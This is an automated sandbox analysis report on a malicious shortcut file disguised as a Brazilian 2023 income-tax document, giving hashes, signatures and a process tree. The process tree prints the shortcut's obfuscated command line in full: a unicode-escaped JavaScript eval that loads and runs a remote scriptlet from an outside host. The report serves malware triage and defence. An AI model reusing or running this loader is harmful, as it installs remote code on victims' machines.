Overview

overview

8

Static

static

1

IRPF2023_R...1..zip

windows7-x64

1

IRPF2023_R...1..zip

windows10-2004-x64

1

IRPF2023_R...71.lnk

windows7-x64

3

IRPF2023_R...71.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    29s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    06-06-2023 13:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IRPF2023_R391071958.659826.33271.lnk

  • Size

    1KB

  • MD5

    e880916fd36e6e85d5779efeeca4477f

  • SHA1

    5f86fde948792f9705b160b85fef3b07c02d9076

  • SHA256

    b2fc287a710dfbb956fc580a3dda95bd6b42dc420c83b614e6e2aacddd6e4611

  • SHA512

    1705467998be98974d8d59ec7af0d917a1fc99357bc389a0a1aecb5c2ecfdc0a2df1cf343b99efcb709be4d92892763955e05fcd0c8a0fe71129af07b84c0ee5

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\IRPF2023_R391071958.659826.33271.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\drtUPCO\>nul 2>&1 &&s^eT NQOZ=C:\drtUPCO\^drtUPCO.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0068\u0064\u0069\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0068\u0064\u0069\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0068\u0064\u0069\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0068\u0064\u0069\u002b\u0044\u0068\u0064\u0069\u002b\u0045\u0068\u0064\u0069\u002b\u0022\u002f\u002f\u0032\u0069\u0065\u0061\u0061\u006c\u002e\u0064\u006d\u0065\u0061\u0062\u0065\u006c\u0068\u0061\u0065\u006f\u006b\u0061\u006c\u0069\u006c\u006c\u0072\u0074\u0061\u007a\u0069\u006e\u0067\u002e\u007a\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0036\u002f\u0022\u0029\u003b'); >!NQOZ!&&ca^ll !NQOZ!"
      2⤵
        PID:1060

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads